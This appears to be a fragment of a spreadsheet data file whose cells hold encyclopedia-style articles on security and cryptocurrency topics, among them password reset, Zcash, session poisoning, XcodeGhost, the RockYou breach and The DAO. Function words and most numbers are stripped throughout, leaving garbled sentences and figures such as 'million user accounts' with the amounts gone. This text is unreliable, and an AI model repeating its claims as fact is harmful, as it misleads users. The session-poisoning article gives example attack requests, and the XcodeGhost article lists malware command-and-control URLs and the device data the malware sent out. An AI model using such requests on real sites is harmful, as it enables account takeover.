    <t>self-service password reset (sspr) defined process technology allows users either forgotten password triggered intruder lockout authenticate alternate factor, repair problem, without calling help desk. common feature identity management software often bundled software package password synchronization capability. typically users forgotten password launch self-service application extension workstation login prompt, using another user's browser, telephone call. users establish identity, without using forgotten disabled password, answering series personal questions, using hardware authentication token, responding notification e-mail less often, providing biometric sample voice recognition. users either specify new, unlocked password, randomly generated provided. self-service password reset expedites problem resolution users "after fact", thus reduces help desk call volume. also used ensure password problems resolved adequate user authentication, eliminating important weakness many help desks: social engineering attacks, intruder calls help desk, pretends intended victim user, claims forgotten account password, asks password. multi-factor authentication rather merely asking users answer security questions, modern password reset systems also leverage sequence authentication steps: users complete captcha, demonstrate human. users enter sent personal e-mail address mobile phone. require another technology, one-time-password token. leverage biometrics, voice print. authenticator, google authenticator code. security authenticating users purely asking security questions despite benefits, self-service password reset relies solely answers personal questions introduce vulnerabilities, since answers questions often obtained social engineering, phishing techniques simple research. while users frequently reminded never reveal password, less likely treat sensitive answers many commonly used security questions, names, place birth favorite movie. much information publicly available users' personal home pages. other answers elicited someone pretending conduct opinion survey offering free dating service. since many organizations standard ways determining login names real names, attacker knows names several employees organization choose whose security answers readily obtained. this vulnerability strictly self-service password reset—it often exists help desk prior deployment automation. self-service password reset technology often used reduce type vulnerability, introducing stronger caller authentication factors human-operated help desk using prior deployment automation. september 2008, yahoo e-mail account governor alaska vice president united states nominee sarah palin accessed without authorization someone able research answers security questions, code date birth able guess third, husband. this incident clearly highlighted choice security questions important prevent social engineering attacks password systems. preference-based authentication jakobsson, stolterman, wetzel, yang proposed preferences authenticate users password reset. underlying insights preferences stable long period time, publicly recorded. their approach includes phases---setup authentication. during setup, user asked select items either like dislike several categories items dynamically selected candidate presented user random order. during authentication phase, users asked classify preferences (like dislike) selected items displayed random order. jakobsson, stolterman, wetzel, yang evaluated security approach user experiments, user emulations, attacker simulations. email phone based resets many based systems using single sign allow users send password reset link registered email address phone number. however, many large social media platforms reveal part user's email address phone number digits using 'forgotten password' function. often whole email address derived hint. two-factor authentication two-factor authentication 'strong authentication' method, adds another layer security password reset process. cases consists preference based authentication plus second form physical authentication (using something user possesses, i.e. smartcards, tokens, etc.). popular method email. advanced sspr software requires user provide mobile phone number personal e-mail address setup. event password reset, code sent user's phone email need enter code password reset process. modern technology also allows authentication voice biometrics using voice recognition technology. access platform reset major problem self-service password reset inside corporations similar organizations enabling users access system forgot primary password. since sspr systems typically web-based, users need launch browser problem, cannot workstation problem solved. there various approaches addressing catch-22, compromises (e.g., desktop software deployment, domain-wide password reset account, telephone access, visiting neighbour, continuing call help desk, etc.). some companies created software presents restricted browser login screen sole ability access password reset page without logging system; example novell's client login extension technology. because technologies effectively give user access computer resources, specifically browser, reset passwords without authenticating computer, security high priority capabilities limited user cannot expected mode. there additional problems related locked users: mobile users, physically away corporate network, forgot pc's login password. passwords cached operating system browser, might continue offered servers password change initiated another computer (help desk, password management server, etc.) therefore trigger intruder lockout. vouching option conjunction preference-based authentication, self-service password reset procedures could also rely network existing human relations among users. scenario, user forgot password asks colleague assistance. "helper" colleague authenticates password reset application vouches user's identity.in scenario, problem changes authenticating user forgot password understanding users ability vouch users. rbac authorization though important provide multifactor authentication sspr software endpoint faces untrusted networks, another important aspect modern sspr needs address. role base access control (rbac) feature responsible access level provisioning users. when critical self-service password resets privileged accounts want allow account unlocks restrict password change functionality. support teams responsibility changing passwords accounts. more information videos portals work practice found external links section called securemfa sspr portal. references external links self service password reset healthcare health management technology 2012 (retrieved 2019-06-19) forgot password cheat sheet open application security project (retrieved 2019-06-19) password self-service device, anywhere anytime next generation esb-based password management technology ilantus technologies (retrieved 2019-06-19) sucuremfa sspr portal self-service password reset portal rbac functionality explained using video content (retrieved 2021-01-17)</t>
  </si>
  <si>
    <t>PureMessage</t>
  </si>
  <si>
    <t>sophos puremessage anti-spam program sophos plc, aimed primarily corporate environments. sophos puremessage microsoft exchange part email security data protection blocks spam, viruses, spyware phishing. scanning inbound, outbound internal email exchange message stores, proactively protects email-borne threats, prevents confidential data lost.</t>
  </si>
  <si>
    <t>Zcash</t>
  </si>
  <si>
    <t>zcash cryptocurrency aimed using cryptography provide enhanced privacy users compared cryptocurrencies bitcoin. zcash based bitcoin's codebase. shares many similarities, fixed total supply million units.transactions "transparent" similar bitcoin transactions case controlled t-addr, "shielded" controlled z-addr. shielded transaction uses type zero-knowledge proof called zk-snarks, provides anonymity coin holders transaction. zcash coins either transparent pool shielded pool. december 2017 around zcash coins shielded pool time cryptocurrency wallet programs support z-addrs web-based wallets supported them. shielded pool zcash coins analyzed security found anonymity shrunk considerably heuristics-based identifiable patterns usage.zcash affords private transactors option "selective disclosure", allowing user prove payment auditing purposes. reason allow private transactors choice comply anti-money laundering regulations. "transactions auditable disclosure participant's control." company hosted virtual meetings enforcement agencies around u.s. explain fundamentals gone record saying "they develop currency facilitate illegal activity".while miners receive block reward, given "zcash development fund": zcash open major grants, electric coin co., zcash foundation. history development work zcash began 2013 johns hopkins professor matthew green graduate students. development completed for-profit zcash company, zooko wilcox, colorado-based computer security specialist cypherpunk. zcash company raised million silicon valley venture capitalists complete development zcash.zcash first mined late october 2016. initial demand high, within week zcash coins trading five thousand dollars piece. percent coins mined first four years allotted zcash company, employees, investors, non-profit zcash foundation.the setup zcash required careful execution trusted setup procedure something subsequently became known "the ceremony" create zcash private key. order ensure privacy characteristic zcash important generate truly random enormous number used private key, also ensuring person computer retains copy key, could subsequently regenerate key. private available anyone, could generate counterfeit zcash coins, destroying zcash system. ceremony two-day process, executed simultaneously short-window time different locations globally, persons know advance else going participating event. private generated, used instantiate zcash, computers used process reportedly destroyed.on 2017, regarding wannacry ransomware attack zcash's compliance global anti-money laundering standards, zooko wilcox wrote: think successfully make zcash traceable criminals like wannacry, still completely private fungible. …".on march 2018, ariel gabizon, employee zcash company, discovered critical could allowed attacker create infinite amount counterfeit zcash. gabizon shared discovery three employees, including zooko wilcox. october 2018, issue covertly included sapling network upgrade zcash network.on february 2019, "zcash company" announced re-branding electric coin company (ecc). blog post, company claims calling "zcash company" legal name always zerocoin electric coin company, known ecc.on september 2019, announced zcash compliant requirements arising fatf recommendations company blog post titled "how zcash compliant fatf recommendations". ecc's blog post claims virtual asset compliant virtual assets implement "travel rule" requirement.on 2020, paper titled "alt-coin traceability" investigated privacy zcash monero. this paper concluded "more academic research needed zcash overall" privacy guarantees zcash "questionable". paper claimed since current heuristics 2018 usenix security symposium paper entitled empirical analysis anonymity zcash" still continue today result making zcash less anonymous traceable. june 2020, chainalysis added support zcash chainalysis reactor "know your transaction" (kyt) technologies. this permits chainalysis trace provide transaction values least sender receiver address zcash activity. chainalysis explains able accomplish since zcash users privacy-enhancing features. chainalysis also cites research paper rand corporation revealed less 0.2% cryptocurrency addresses dark zcash addresses.on october 2020, announced non-profit 501(c)3 organization called bootstrap project (bootstrap) company blog post titled "ecc’s owners donate ecc". majority investors owners zerocoin electric coin company (ecc) agreed donate company wholly owned property bootstrap. ecc's blog post claims nothing change within company ownership including board directors. october 2020, announced shareholders officially voted favor donating percent company's shares bootstrap.on march 2021, published "ecc transparency report 2020". report, reports "now wholly owned entity 501(c)3 bootstrap". also legality bitcoin country zerocoin protocol zk-snarks references external links official website</t>
  </si>
  <si>
    <t>Session poisoning</t>
  </si>
  <si>
    <t>session poisoning (also referred "session data pollution" "session modification") method exploit insufficient input validation within server application. typically server application vulnerable type exploit copy user input session variables. underlying vulnerability state management problem: shared state, race condition, ambiguity plain unprotected modifications state values. session poisoning demonstrated server environments different, non-malicious applications (scripts) share session states usage differ, causing ambiguity race conditions. session poisoning demonstrated scenarios attacker able introduce malicious scripts server environment, possible attacker victim share host. origins session poisoning first discussed (potentially new) vulnerability class full disclosure mailing list. alla bezroutchko inquired "session data pollution vulnerabilities applications" problem january 2006. however, vulnerability previously noted others: "this classic state management issue" yvan boily; "this new" /someone.earlier examples vulnerabilities found major security resources/archives bugtraq, e.g. july 2001, serious security hole mambo site server version 3.0.x ismael peinado palomo reverseonline.com september 2005, session modification unknown (from uw-team) adam_isession pollution also covered articles, session security, przemek sobstel, 2007. attack examples trivial attack scenario example code vulnerable problem session("login") request("login") session("username") request("username") which subject trivial attacks vulnerable.asp?login=yes&amp;username=mary this problem could exist software user submits username password logon.asp password mary checks out, logon.asp forwards vulnerable.asp?login=yes&amp;username=marythe problem vulnerable.asp designed assumption page accessed non-malicious way. anyone realizes script designed, able craft http request sets logon user arbitrarily. exploiting ambiguous dual session variable alla bezroutchko discusses scenario $_session['login'] used different purposes. login scripts, session variable stores "this user logged on". password reset scripts, session variable stores "this user wants password reset".a race condition demonstrated, reset scripts could exploited change logged user arbitrarily. exploiting scripts allowing writes arbitrary session variables alla bezroutchko discusses examples observed development forums, allows writing arbitrary session variables.the first example $_get["something"] probably selection similar). attack becomes vulnerable.php?something=session_var_to_poison session poisoning attacks enabled php.ini: register_globals php.ini: register_globals known enable security vulnerabilities several applications. server administrators recommended disable feature. note: real-world examples session poisoning enabled register_globals publicly demonstrated back july 2001 article serious security hole mambo site server version 3.0.x.second example /someone vulnerable possible attacker cause conditions false. php.ini misconfigured (register_globals on), allows $var default value controlled (get, post, cookie) input.attack becomes vulnerable.php?var=session_var_to_poison exploit utilizing shared server (e.g. shared hosting) 'unknown' uw-team.org discusses scenario attacker victim shares server.attack fairly easy: attacker first visits victim's page, e.g. attacker uploads script account, display context $_session (set victim script). attacker determines variable needs changed, uploads script sets variable, executes attacker visits victim pages anticipated exploit worked.this attack requires victim attacker share server. attack dependent victim attacker virtual hostname, trivial attacker move session identifier cookie cookie domain another. also session fixation references</t>
  </si>
  <si>
    <t>XcodeGhost</t>
  </si>
  <si>
    <t>xcodeghost (and variant xcodeghost modified versions apple's xcode development environment considered malware. software first gained widespread attention september 2015, number apps originating china harbored malicious code. thought "first large-scale attack apple's store", according bbc. problems first identified researchers alibaba, leading e-commerce firm china. over 4000 apps infected, according fireeye, initially acknowledged apple, including apps authors outside china. security firm palo alto networks surmised network speeds slower china, developers country looked local copies apple xcode development environment, encountered altered versions posted domestic sites. this opened door malware inserted high profile apps used devices.even months initial reports, security firm fireeye reported hundreds enterprises still using infected apps xcodeghost remained persistent security risk". firm also identified variant malware dubbed xcodeghost among apps infected popular messaging wechat netease music 163. discovery september 2015, chinese developer mentioned social network sina weibo malware xcode injects third party code apps compiled alibaba researchers published detailed information malware called xcodeghost. september 2015, palo alto networks published several reports malware. operation propagation because slow download speed apple servers, chinese developers would download xcode third party websites, baidu (now called baidu wangpan), cloud storage service hosted baidu, copies co-workers. attackers took advantage situation distributing compromised versions file hosting websites.palo alto networks suspects malware available march 2015. attack vector origins attacker used compiler backdoor attack. novelty attack modification xcode compiler. however, according documents leaked edward snowden, security researchers sandia national laboratories claimed "had created modified version apple’s proprietary software development tool, xcode, could sneak surveillance backdoors apps programs created using tool." modified files known versions xcodeghost extra files original xcode application: core service framework ios, simulator platforms idebundleinjection framework added ios, simulator platformsxcodeghost also modified linker link malicious files compiled app. this step reported compiling xcode ide. both apps vulnerable xcodeghost. deployment xcodeghost compromised coreservices layer, contains highly used features frameworks used app. when developer compiles application compromised version xcode, malicious coreservices automatically integrated without developer's knowledge. then malicious files extra code uiwindow class uidevice class. uiwindow class object manages coordinates views displays device screen".the uidevice class provides singleton instance representing current device. from instance attacker obtain information device assigned name, device model, operating-system name version. behavior infected devices remote control security risks xcodeghost remotely controlled commands sent attacker command control server http. this data encrypted using algorithm mode. encryption mode known weak, encryption keys also found using reverse engineering. attacker could perform middle attack transmit fake http traffic device open dialog open specific example). stealing user device information when infected launched, either using iphone simulator inside xcode, xcodeghost automatically collect device information current time current infected app's name app's bundle identifier current device's name type current system's language country current device's uuid network typethen malware encrypt data send command control server. server differs version version xcodeghost; palo alto networks able find three server urls: http://init.crash-analytics.com http://init.icloud-diagnostics.com http://init.icloud-analysis.comthe last domain also used malware keyraider. read write clipboard xcodeghost also able, time infected launched, store data written clipboard. malware also able modify data. this particularly dangerous user uses password management app. hijack opening specific urls xcodeghost also able open specific urls infected launched. since apple work inter-app communication mechanism (e.g. 'whatsapp://', 'facebook://', 'itunes://'), attacker open apps installed compromised phone computer, case infected macos application. such mechanism could harmful password management apps even phishing websites. prompting alert dialog current known version xcodeghost cannot prompt alert dialogs user device. however, requires minor changes. using uialertview class uialertviewstyleloginandpasswordinput property, infected display fake alert dialog looks like normal apple user credential check send input command control server. infected apps among chinese apps, app, banking apps, mobile carrier's app, maps, stock trading apps, apps games infected. popular apps used world also infected wechat, popular instant messaging app, camscanner, scan document using smartphone camera winzip. pangu team claimed counted 3,418 infected apps.fox-it, netherland-based security company reports found thousand malicious traffic outside china. removal neutralizing command control servers compromised versions xcode since article alibaba palo alto networks, amazon took servers used xcodeghost. baidu also removed malicious xcode installers cloud storage service. removing malicious apps store september 2015 apple admitted existence malware began asking developers compromised apps compile apps clean version xcode submitting review again. pangu team released tool detect infected apps device, like antivirus apps device jailbroken. apple allow antivirus apps store. checking xcode version apple advises xcode developers verify version xcode always gatekeeper activated machine. references</t>
  </si>
  <si>
    <t>RockYou</t>
  </si>
  <si>
    <t>rockyou company developed widgets myspace implemented applications various social networks facebook. since 2014, engaged primarily purchases rights classic video games; incorporates in-game re-distributes games. history based francisco, california, rockyou founded 2005 lance tokuda shen. company's first product, slideshow service, designed work application widget. later applications included various forms voice mail, text photo stylization, games. december 2007, successful widget maker facebook platform terms total installations.in 2007, rockyou companies invited participate event facebook announced open platform allowing third parties develop operate software applications facebook website. applications made facebook include super wall, "hug me", likeness, vampires, slideshows, birthdays, mygifts, emote, among others.in december 2009, rockyou experienced data breach resulting exposure million user accounts. this resulted storing user data unencrypted database (including user passwords plain text instead using cryptographic hash) patching ten-year-old vulnerability. rockyou failed provide notification breach users miscommunicated extent breach.in october 2010, company completed major layoffs. november 2010, company's founder ceo, lance tokuda, stepped position later replaced lisa marino april 2011.in 2010, rockyou announced acquisitions game development studios, tirnua playdemic, well development agreements games john romero's social game studio loot drop. playdemic's first game, gourmet ranch, nominated february 2011 mochi award best social game. rockyou's investors include softbank, sequoia capital, lightspeed venture partners, partech international, dcm.in 2011, company agreed undergo independent security audits settle proposed class action california 2009 data breach exposed millions passwords email addresses.in 2012, company settled federal trade commission charges. settlement barred future deceptive claims company regarding privacy data security, required implement maintain data security program, barred future violations children's online privacy protection (coppa) rule, required $250,000 civil penalty settle coppa charges.on june 2012, rockyou acquired bingo developer ryzing relocated headquarters francisco, california. august 2012, rockyou launched walking dead social game based amc's series name. april 2014, rockyou purchased three playdom social games disney: gardens time, words wonder, city girl, announced licensing army attack, crazy penguin wars, millionaire city, zombie lane digital chocolate.in 2015, rockyou purchased godfather: five families, kingdoms camelot, edgeworld, glory rome, dragons atlantis kabam. 2016, rockyou acquired nations gree. 2019, rockyou closed popular money-losing pureplay poker game without notice. shortly after, rockyou corporate website went dark. february 2019, several facebook posts promoting "exciting news" plan upgrade servers, rockyou announced closure godfather: five families. players given days' notice. february 2019, rockyou filed chapter bankruptcy u.s. bankruptcy court southern district york. data breach december 2009, company experienced data breach resulting exposure million user accounts. company used unencrypted database store user account data, including plaintext passwords opposed password hashes) service, well passwords connected accounts partner sites (including facebook, myspace, webmail services). rockyou would also e-mail password unencrypted user account recovery. they also allow using special characters passwords. hacker used 10-year-old vulnerability gain access database. company took days notify users incident, initially incorrectly reported breach affected older applications actually affected rockyou users.the full list passwords exposed result breach available kali linux, since launch 2013. easy attainability comprehensive length, commonly used dictionary attacks. social applications games bingo blingo rockyou poker world classic city girl life words wonder gardens time kitchen scramble bakery blitz glory rome kingdoms camelot dragons atlantis brightwood adventures pieces flair pioneer adventures gold rush lost island volcano island world skull island rapid poker kahzuu slots solitare arena solitare arena lucky slots nations crazy penguin wars horoscopes rockyou live speed racing world world birthday cards edgeworld hero world casino land super pets movie blitz godfather: five families walking dead social game jackpot bingo mall world fashion designer zombie lane millionaire city pureplay poker army attack references</t>
  </si>
  <si>
    <t>Tcharmil</t>
  </si>
  <si>
    <t>tcharmil (sometimes tcharmile mesharmil french spanish) expression moroccan dialect traditionally indicating range marinaded spicy food flavours meat dishes includes garlic, olive parsley. also kind youth subculture, gained momentum recent years among disaffected moroccan youth.more recently name adopted gangs youths slums country. their modus operandi spread extreme fear placing video images members commuting crimes extreme violence social media. most criminals commit tcharmil tend violent, usually stab leave scar wounds victim's face despite receiving (mobile phones, wallet, etc...). tcharmil display distinctive hair-styles seek emulate organized hispanic street gangs united states america latin kings. their preferred weapons meat cleavers butchers knives.the first attack occurred fashionable hair salon district maârif casablanca march 2014. three male youths entered wreaked havoc wielding machetes. clients fled terror. copycat crime wave ensued occasioning serious assaults occasioning actual bodily harm violent deaths. tcharmil although begun casablanca, quickly spread fes, meknes, agadir, rabat, temara marrakesh appearing moroccan cities. combat phenomenon, king mohammed morocco april 2014 launched major national police campaign resulting multiple arrests.the number recent attacks rise throughout moroccan cities; this mainly lack police force poor neighborhoods lack severe sentences. most "mcharmline" (perpetrators), usually receive light jail sentences varying months year jail caught, allowing gain confidence commit even violent crimes upon exiting prison. references</t>
  </si>
  <si>
    <t>Rpmsg</t>
  </si>
  <si>
    <t>rpmsg file restricted-permission message extension rpmsg. used implement outlook messages controlling access content encryption access controls, restricting certain actions ability forward copy.messages format normally created users azure information protection, azure rights management active directory rights management services. implementation rpmsg file created writing body, attachments images compound file compressing encrypting create blob: rpmsg file. this resulting file named message.rpmsg included attachment normal outlook message. applications support format, microsoft outlook, transparently extract render message contained attachment protected message, ignoring mime wrapper message hosts this implemented parsing file structure in-code, currently msipc sdk, normally used applications protect decrypt content protected azure information protection, provide native functionality encode decode rpmsg format.other applications mobile mail clients rely exchange activesync perform decryption behalf deliver version message render directly. rights control when rights managed mail created author specifies rights wish grant recipient rights specified form xrml certificate called 'publishing license'. this certificate included within encrypted rpmsg file. when rpmsg attachment decrypted enclosed 'publishing license' sent information protection service pointed header order obtain license. service, analyzing policy certificate matching identity requestor, build license, another xrml encoded document, delivered client used outlook determine recipient cannot message (rights forward, copy etc.). file format rpmsg file consists magic number followed data chunks. magic number eight-byte sequence each data chunk consists 12-byte header followed variable amount data bytes. chunk header consists dwords little-endian byte order: magic number uncompressed chunk length compressed chunk length xx.the chunk body consists bytes compressed data. concatenated data chunks form single data stream compressed using deflate algorithm. format uncompressed data compound file binary document. more specifically, uncompressed data conforms office document cryptography structure format. references external links official page azure information protection compound file binary file format</t>
  </si>
  <si>
    <t>The DAO (organization)</t>
  </si>
  <si>
    <t>(stylized digital decentralized autonomous organization form investor-directed venture capital fund. after launching april 2016 token sale, became largest crowdfunding campaigns history.the objective provide decentralized business model organizing commercial non-profit enterprises. instantiated ethereum blockchain conventional management structure board directors. code open-source. june 2016, users exploited vulnerability code enable siphon one-third dao's funds subsidiary account. ethereum community controversially decided hard-fork ethereum blockchain restore approximately funds original contract. this split ethereum blockchain branches, cryptocurrency, original unforked blockchain continued ethereum classic.by september 2016, value token dao, known moniker dao, delisted major cryptocurrency exchanges (such poloniex kraken) had, effect, become defunct. history open source computer code behind organization written principally christoph jentzsch, released publicly github, contributors added modified code. simon jentzsch, christoph jentzsch's brother, also involved venture.the launched april 2016 01:42:58 +utc ethereum block 1428757, website 28-day crowdsale fund organization. token sale raised us$34 million 2016, us$50 million-worth ether (eth)—the digital value token ethereum network—by may, us$100 million 2016. 2016, largest investor held less tokens holders held tokens. fund's ether value 2016 us$150 million, 11,000 investors.as 2016, attracted nearly ether tokens issued date.on 2016 tokens became tradable various cryptocurrency exchanges.a paper published 2016 noted number security vulnerabilities associated dao, recommended investors hold directing invest projects problems resolved. ethereum developer github pointed flaw relating "recursive calls". june blogged peter vessenes, founder blockchain foundation. june fixes proposed awaiting approval members dao. june attention called recursive call vulnerabilities bloggers affiliated initiative cryptocurrencies contracts (ic3).on june 2016, subjected attack exploiting combination vulnerabilities, including concerning recursive calls, resulted transfer million ether around third 11.5 million ether committed valued time around $50m. funds moved account subject 28-day holding period terms ethereum smart contract actually gone. members ethereum community debated next, calling attack valid unethical maneuver, others calling ether re-appropriated, calling shut down. eventually, ethereum network hard forked move funds recovery address could exchanged back ethereum original owners. however, continued original unforked ethereum blockchain, called ethereum classic. september 2016, poloniex de-listed trading pairs, followed kraken december 2016. operation decentralized autonomous organization exists contracts resides ethereum blockchain; physical address, people formal management roles. original theory underlying removing delegated power directors placing directly hands owners removed ability directors fund managers misdirect waste investor funds.as blockchain-enabled organization, claimed completely transparent: everything done code, anyone could audit. however, complexity code base rapid deployment meant intended behavior organization actual behavior differed serious ways apparent attack occurred.the intended operate disperses funds (currently ether, ethereum value token) projects". investors received voting rights means digital share token; vote proposals submitted "contractors" group volunteers called "curators" check identity people submitting proposals make sure projects legal "whitelisting" them. profits investments flow back stakeholders.the hold money investors; instead, investors owned tokens gave rights vote potential projects. anyone could pull funds time first voted.the dao's reliance ether allowed people send money anywhere world without providing identifying information.in order provide interface real-world legal structures, founders established swiss-based company, dao. link, registered société responsabilité limitée (sarl) switzerland, apparently co-founded slock.it neuchatel-based digital currency exchange bity according jentzsch, dao. link switzerland swiss allowed "take money unknown source long know going." marketing 2016, techcrunch described paradigm shift idea economic organization. offers complete transparency, total shareholder control, unprecedented flexibility, autonomous governance." risks 2016, plan called invest ether ventures, would back (contractors) receive return "clear payment terms" contractors. organizers promoted providing investors return investment "clear payment terms" warned investors, "significant risk" ventures funded fail. risks included unknown attack vectors programming errors. additional risks included lack precedence regulatory corporate law; unknown governments regulatory agencies would treat contracts made. there also risk would corporate veil protecting investors individual legal financial liability actions taken contractors invested. unclear selling securities, was, type securities might be.dao democratized organizational structure control spread among members. there leadership regulation structure. members transfer cryptocurrency little regulation, risk fraud remains. there also recover funds member mistakenly transfer cryptocurrency wrong wallet.additionally, function real world, contractors would likely need convert invested ether real-world currencies. 2016, attorney andrew hinkes said sales ether would likely depress value ether. code behind several safeguards aimed prevent creators anyone else mechanically gaming voting shareholders investments. however, would prevent making fraudulent profitability projections, addition, paper cited "number security vulnerabilities". proposals slock.it german blockchain venture), mobotiq french electric vehicle start-up) listed seeking potential funding daohub.org website "creation period". both jentzsch brothers involved slock.it well. regulation july 2017, u.s. securities exchange commission published report initial coin offerings (icos) dao, examining "whether associated entities individuals violated federal securities laws unregistered offers sales tokens exchange 'ether,' virtual currency." concluded tokens sold ethereum blockchain securities therefore possible violations u.s. securities laws. references further reading vessenes, peter june 2016). "deconstructing attack: brief code tour". dupont, quinn (2017). “experiments algorithmic governance: ethnography "the dao," failed decentralized autonomous organization” (archive link). bitcoin beyond: challenges opportunities blockchains global governance, edited malcolm campbell-verduyn. routledge press).</t>
  </si>
  <si>
    <t>Shaltai Boltai</t>
  </si>
  <si>
    <t>anonymous international hacking group known leaking russian government information personal documents government officials. they target high-ranking members government, large corporations, media, sell stolen data. these actions publicized blog, shaltai boltai, (шалтай-болтай, russian '"humpty dumpty"'), name group also known. over period months group published information russian politicians separate occasions. october 2016, vladimir anikeyev (владимир аникеев), known handle "lewis," considered group's leader, arrested charged unlawful access computer information. addition anikeyev, five people detained, among leaders fsb's information security center, sergei mikhailov, deputy dmitry dokuchaev, well ruslan stoyanov, former head kaspersky lab's computer incident investigation department. october 2018, co-founders shaltai boltai, alexander glazastikov, arrested absentia russia. also mikhailov case references external links shaltai boltai twitter "down rabbit hole with russia's mysterious leakers," seddon, buzzfeed, june 2014</t>
  </si>
  <si>
    <t>Security token offering</t>
  </si>
  <si>
    <t>security token offering (sto) tokenized type public offering tokenized digital securities, known security tokens, sold security token exchanges. tokens used trade real financial assets equities fixed income, blockchain virtual ledger system store validate token transactions.due tokens classified securities, stos susceptible regulation thus represent secure investment alternative icos, subject numerous fraudulent schemes. furthermore, since icos held traditional exchanges, less expensive funding source small medium-sized companies compared ipo. regulated stock exchange (referred tokenized ipo) potential deliver significant efficiencies cost savings, however. 2019, stos used multiple scenarios including trading nasdaq-listed company stocks, pre-ipo world chess, fide's official broadcasting platform, creation singapore exchange's market, backed japan's tokai tokyo financial holdings. controversy regarding icos though sharing core concepts icos ipos, stos fact different both, standing intermediary model. similarly icos, stos offerings made selling digital tokens general public cryptocurrency exchanges binance, kraken, binaryx others. main difference stands fact tokens offered cryptocurrency's actual coins, entirely digital, classified utilities. currencies generated infinitum, might cases tokens. additionally, value almost entirely speculative arises perceived utility value buyers expect provide. security tokens, hand, actual securities, like bonds stocks, tied real company.in terms legislation, jurisdictions treat stos, icos, cryptocurrency-related operations legislative umbrella. general, though, stos placed securities legislation (together traditional ipos), icos utilities, differentiation made mostly case-by-case basis.the main debate surrounding security tokens thus, legal differentiation qualified utility instead security. generally, legislation understands passive financial return expected investment, classified security. this way, even offering company understands tokens merely utility asset expected return investment, proven otherwise becomes unregulated sto, passive legal punishment. moreover, assumption utility abused offering companies sell securities without regulatory compliance (maliciously labeled icos).this legal ambiguity offerers prosecuted security offering part, though tokens announced utilities. such companies include messaging apps telegram, former sued $100 million latter delaying offering plans similar prosecution. regulation main selling points cryptocurrencies bitcoin decentralization aspect, government influence control currency. extension, cryptocurrency directly affected specific country's jurisdiction, sociopolitical environment, economic events. such lack regulation rising large-scale crypto-related criminal activity, ranging terrorist funding evasion, untracked unpunished. similarly, scams increasingly troublesome matter, causing billions dollars losses damaging cryptocurrency market's value whole.so far, stos regulated legalized many countries icos not, fitting many already pre-existing regulations regarding securities. examples security token offerings there various stos globally. article oxford school identified projects now. largest limited raised $330 million. success rate projects lies somewhere near threshold. ethereum leading blockchain platform used issuance. stellar comes second position major german restaurant chain l'osteria late 2019. also 2019, swiss-based blockchain developer, jibrel collaboration dhabi global market, launched jibrel.com, platform offering security tokens tied startup equity.inx becomes largest traded security token world within days start trading security token offering service providers there least confirmed security token offering service providers. some newly launched like pathfund, safememe, memepad, trustpad, ampnet, etc. many rapidly moving towards developed stage crypto market. also initial coin offering initial public offering alternative currencies private currency digital asset references</t>
  </si>
  <si>
    <t>Tarsnap</t>
  </si>
  <si>
    <t>tarsnap secure online backup service unix-like operating systems, including bsd, linux, created 2008 colin percival. tarsnap encrypts data, stores amazon service service designed efficiency, uploading storing data directly changed since last backup. security keys known user.it developed debugged, input solicited bounty hunters, find vulnerabilities. serious nonce-reuse vulnerability found process fixed 2011.the document presentation "from bsdtar tarsnap" percival eurobsd-con 2013 contains "all kinds detail exactly algorithms work, deduplication managed innards tarsnap works" also comparison online backup services references external links official website tarsnap presentation crowd-sourcing bounties</t>
  </si>
  <si>
    <t>Rightscorp</t>
  </si>
  <si>
    <t>rightscorp, inc. (formerly digitalrights) angeles-based copyright enforcement company locates alleged copyright violators collects money legal damages court settlements behalf copyright holder. rightscorp manages copyrights videos, music, video games. services clients rightscorp represents music, movie print publishers. 2014, rightscorp reached million copyrights managed, including held warner bros. company manages copyrights feature films, including movie titles gross sales $3.5 billion.rightscorp works music interests rights management, represents musicians david bowie, kings leon, will.i.am member american association independent music. company represents 13,000 copyrights held blue productions metal/hardcore label rotten records. during week february 2013, company also monitoring songs billboard 100. monitoring rightcorp utilizes crawlers, according steele christopher sabec, crawls bittorrent file-sharing sites finds seeders addresses time. though company seeders’ addresses, requires isps connect notices seeders. sabec also says company discriminate actual piracy unauthorized internet access, evidence substantiate claim.in response mobile streaming apps meerkat, periscope popcorn time, company also announced "streaming rights monitoring" service 2015, rightscorp claims able continuously monitor streaming copyrighted material mobile streaming networks. notice forwarding after determining target address, rightscorp requests internet service provider address forward notice infringement user. subscribers american isps paid settlements company, including charter communications, centurylink others. rightscorp robert steele told technica isps forwarding notices month. according company, isps participating rightscorp november 2014.however, isps always choose comply request forward notices. november 2014, music publishers round hill suing communications terminating accounts users identified rightscorp allegedly repeat downloaders. 2015, rightscorp filed suit comcast users downloading albums, including acid bath's when kite string pops d.r.i.'s definition. company claims downloaders ignored notices, other, 288. rotten records, rightscorp, demanding injunction infringement, deletion files fine $150,000 work. settlements disconnections notice infringement, rightscorp offers choice paying small settlement (around violation) facing possible lawsuit damages around $150,000 digital millennium copyright (dmca), current law. after collection, rightscorp’s settlements split 50/50 clients.the company compares settlement option alleged infringement traffic ticket, calling "socially fair create deterrent." even though notice works settlement offer, notice enforceable liability infringed offender determined civil court. user chooses repeatedly alleged violated copyright infringements, suspend terminate subscriber account settlement reached. torrentfreak claimed 2011 200,000 bittorrent users stage lawsuit alleged copyright infringement. company also announced closed 75,000 cases online copyright infringement. lawsuits class action lawsuit november 2014 morgan pietz pietz firm, together drew pomerance roxborough, pomerance, adreani filed class action lawsuit rightscorp inc, various john does, owners, christopher sabec, robert steele, outside legal counsel, craig harmon. complaint seeks class certification rightscorp violations telephone consumer protection act, fair debt collection practices act, california’s rosenthal act, abuse process willful misuse subpoena power issuing special dmca subpoenas, u.s.c. 512(h). pietz's original plaintiff withdrew case. after locating replacement plaintiffs, refiled suit, dropped half claims originally contained subsequently, pietz's surviving claims stricken court, process, legal fees awarded pietz's client. approximately time, pietz's objections, court dismissed harmon (whom pietz incorrectly identified employee officer rightscorp) case. 2015, federal court ordered john blaha, represented pietz, attorney’s fees john blaha rightscorp. pietz filed lawsuit class action; asserted rightscorp, behalf warner bros rights management, abused judicial system issuing dmca subpoenas. rightscorp countered suing grounds violation first amendment subject california’s anti-slapp laws. judge sided rightscorp, still faces allegation violated telephone consumer protection making automated calls demand settlements. telephone consumer protection lawsuit february 2015 plaintiffs melissa brown jenkins represented attorney sergei lemberg lemberg filed lawsuit rightscorp clients named john does 1-10 united states district court middle district georgia telephone consumer protection abuses violations.brown jenkins claim rightscorp clients violated america’s telephone consumer protection sending automated calls text messages general direction without permission. evidence shows jenkins sent rightscorp numerous emails instructing rightscorp cease calls, text messages, emails letter solicitations brown. regardless, rightscorp continued place calls text messages plaintiffs’ cellular home phones. brown jenkins seeking damages alleged violation telephone consumer 